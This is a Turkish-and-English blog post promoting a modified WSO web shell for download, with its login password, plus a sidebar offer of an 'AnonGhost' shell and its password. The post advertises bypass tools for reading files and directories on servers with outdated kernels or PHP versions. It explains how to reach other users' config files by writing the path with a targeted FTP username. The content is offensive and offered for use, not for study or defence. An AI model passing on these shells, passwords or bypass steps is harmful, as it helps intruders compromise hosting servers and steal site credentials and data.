7 Ocak 2021 Perşembe

Wso Shell Download

 


Download

Shell Login password: ghost287

Her wso shellde olmayan, sadece modifiye edilmiş bazı wso shellerde bulunan bypass menüsü oldukça etkilidir. 3 dosya okuma bypass aracı ve 1 dizin okuma bypass aracı vardır, kerneli ve php sürümü güncel olmayan sunucularda çok tehlikelidir.

Wso shell ile bir çok sunucuyu rahatlıkla geçebilirsiniz Symlink gibi açıklar sunucularda çalışmayabilir ancak wso bypass bir anda tüm güvenlikleri atlatabilir.Yapmanız gereken tek şey hedeflediğiniz ftp user adını kullanarak config yoluna kadar yazmak, sunucuların kullandığı panele göre bu dizin yolları değişim gösterebilir buna dikkat edin.

With Wso shell, you can easily pass many servers. Explanations like Symlink may not work on servers, but wso bypass can bypass all security at once.

The only thing you need to do is to write up the config path using the ftp user name you target, these directory paths may differ according to the panel used by the servers.

Download Shell Login password: ghost287


Logsuz Wso shell, logsuz wso shell download, logsuz wso shell indir

Hiç yorum yok:

Yorum Gönderme

AnonGhost Shell, AnonGhost Shell Download, AnonGhost Shell indir, AnonGhost.txt

  Download Download shell pass: AnonGhost<3AG6 Shell login kısmına sifreyi yazıp enterle.sonra hata sayfası çıkacak. Tekrar shell e giris...